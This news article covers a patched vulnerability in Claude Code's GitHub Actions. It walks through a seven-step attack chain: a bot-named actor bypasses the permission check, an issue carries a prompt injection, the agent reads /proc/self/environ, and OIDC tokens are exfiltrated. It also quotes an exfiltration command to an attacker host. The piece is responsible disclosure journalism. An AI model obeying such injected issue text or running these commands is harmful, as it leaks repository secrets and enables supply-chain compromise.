Singularity.Kiwi

AI progress, with honesty.
A GitHub repository page with a red security warning overlay, padlock icon broken, dark background with green code terminal text, cybersecurity aesthetic
News 3 June 2026

A Single GitHub Issue Could Have Compromised Every Claude Code User — Here's How Anthropic Fixed It

A flaw in Claude Code's GitHub Actions trusted any actor ending in [bot]. Combined with prompt injection, an attacker could exfiltrate secrets, steal OIDC tokens, and push malicious code to every downstream repo. Patched in v1.0.94.

AnthropicClaude CodeGitHub ActionsSupply Chain SecurityPrompt Injection

Answer-First Lead

Security researcher RyotaK from GMO Flatt Security discovered a critical vulnerability in Claude Code’s GitHub Actions that could have allowed any unauthenticated attacker to compromise repositories using Anthropic’s official CI/CD workflow — including Anthropic’s own infrastructure. The flaw: the checkWritePermissions function unconditionally trusted any actor ending in [bot]. Combined with prompt injection, that bypass was enough to steal secrets, exfiltrate OIDC tokens, and push malicious code downstream. Patched in v1.0.94. Bounty: $4,800.

🔍 THE BOTTOM LINE

AI coding tools are becoming part of the software supply chain. When they get a permission model wrong, it’s not just one app — it’s every repo that trusts them. This was a seven-step attack chain from “create a GitHub App” to “push backdoored code to Anthropic’s own repository.”

The Vulnerability

Claude Code’s GitHub Actions restrict workflow execution to users with write or admin access. That’s sensible. But the checkWritePermissions function had a fatal flaw: it unconditionally trusted any actor whose name ended in [bot].

GitHub Apps have implicit read access to public repositories and can create issues or pull requests using only an installation token. So an attacker could:

  1. Create a malicious GitHub App
  2. Install it on any attacker-controlled repo (no special permissions needed)
  3. Use its installation token to open an issue or PR on the target repository

Because the actor appeared as a GitHub App bot, the permission check returned true. The workflow processed the attacker-controlled content. Game over.

What is OIDC in GitHub Actions? OpenID Connect — a protocol GitHub Actions uses to authenticate workflows to cloud providers. If an attacker steals OIDC tokens from a workflow, they can impersonate that workflow and access any cloud resources it’s authorised for.

The Attack Chain

The full exploit required seven steps:

  1. Create a rogue GitHub App — No special permissions needed
  2. Install it on an attacker-controlled repo
  3. Open an issue on the target repo — The bot name bypasses permission checks
  4. Prompt injection via issue description — A fake error message tricks Claude Code into executing embedded commands
  5. Read /proc/self/environ — Claude Code allows cat without explicit approval. This Linux pseudo-file exposes all environment variables
  6. Exfiltrate OIDC tokensACTIONS_ID_TOKEN_REQUEST_TOKEN and ACTIONS_ID_TOKEN_REQUEST_URL are among the exposed variables
  7. Exchange tokens for write access — Use stolen OIDC credentials to obtain a GitHub App token with write access to repo contents, issues, PRs, and workflows

The most alarming part: Anthropic’s own anthropics/claude-code-action repository used a vulnerable agent mode workflow. A successful exploit would have injected malicious code directly into the action’s source, propagating to every downstream repository depending on it — a textbook supply chain attack.

Two Attack Vectors

RyotaK identified two distinct paths to exploitation:

Vector 1: GitHub App bot bypass

  • Create a bot-named actor that passes the checkWritePermissions check
  • Agent mode lacked the checkHumanActor safeguard that tag mode had
  • Open an issue with prompt injection content
  • Exfiltrate secrets through Claude’s own issue triage tools

Vector 2: Workflow chaining

  • Anthropic’s example workflows used allowed_non_write_users: "*"
  • Combined with issues: write and id-token: write in a second workflow
  • An attacker could use the triage workflow to steal GITHUB_TOKEN via publicly visible workflow run summaries
  • Then edit an existing issue to inject prompts into the tag-mode workflow
  • Full repository compromise without needing the GitHub App bypass at all

Even the gh issue view command was weaponisable — prompt injection could instruct Claude to embed secrets in URL path arguments (e.g., gh issue view https://attacker.com/<secret>), sending credentials to an external server.

The Fix

Anthropic patched the vulnerability in Claude Code GitHub Actions v1.0.94. The fixes include:

  • Added checkHumanActor call to agent mode — closing the bot bypass
  • Disabled workflow run summary section by default — preventing token exfiltration through visible logs
  • Scrubbed environment variables from child processes/proc/self/environ no longer leaks secrets
  • Custom gh command wrapper — validates arguments and blocks exfiltration-capable URL patterns
  • Post-trigger edit protection — ignores issues and comments edited after a workflow is triggered, closing the workflow-chaining attack

CVSS v4.0 score: 7.8 (high severity). Anthropic awarded $3,800 plus a $1,000 bonus through its bug bounty program.

The Bigger Problem

This vulnerability illustrates a systemic issue with AI coding tools entering the supply chain. When Claude Code runs in GitHub Actions, it’s not just an assistant — it’s an actor with access to secrets, tokens, and write permissions. A permission model that trusts bots unconditionally, combined with prompt injection, creates a path from “anyone on the internet” to “full repository compromise.”

The attack surface is real and growing:

  • AI coding tools are embedded in CI/CD pipelines across millions of repos
  • Prompt injection is a well-understood but still-unpatchable class of vulnerability for LLMs
  • Supply chain attacks amplify a single compromise across all downstream dependencies

This isn’t just an Anthropic problem. Any AI tool with GitHub Actions integration, write permissions, and LLM-driven command execution has a similar attack surface. The question isn’t whether more of these vulnerabilities exist — it’s how quickly they’ll be found.

❓ Frequently Asked Questions

Q: Am I affected? If you use Claude Code GitHub Actions, check your version. v1.0.94 or later is patched. Anything earlier is vulnerable. Also audit any workflow using allowed_non_write_users: "*" — that configuration is inherently risky.

Q: Was this exploited in the wild? No. RyotaK reported the vulnerability responsibly and Anthropic patched it before any known exploitation. The attack was demonstrated in a proof-of-concept, not real-world attacks.

Q: Is this an AI problem or a security design problem? Both. The permission model flaw (trusting [bot] actors) is a traditional security bug. But prompt injection — tricking an AI into executing commands it shouldn’t — is an AI-specific vulnerability class. The combination makes AI-powered CI/CD tools particularly dangerous.

🔍 THE BOTTOM LINE

One bot name check. One missing checkHumanActor call. One cat /proc/self/environ. That’s all it took to go from “anyone on the internet” to “compromise Anthropic’s own infrastructure and every repo downstream.” Patched, yes. But the pattern — AI tools with excessive permissions in CI/CD pipelines — is everywhere. This won’t be the last one.

Sources

Sources: Cybersecurity News, GMO Flatt Security, Anthropic

Related Articles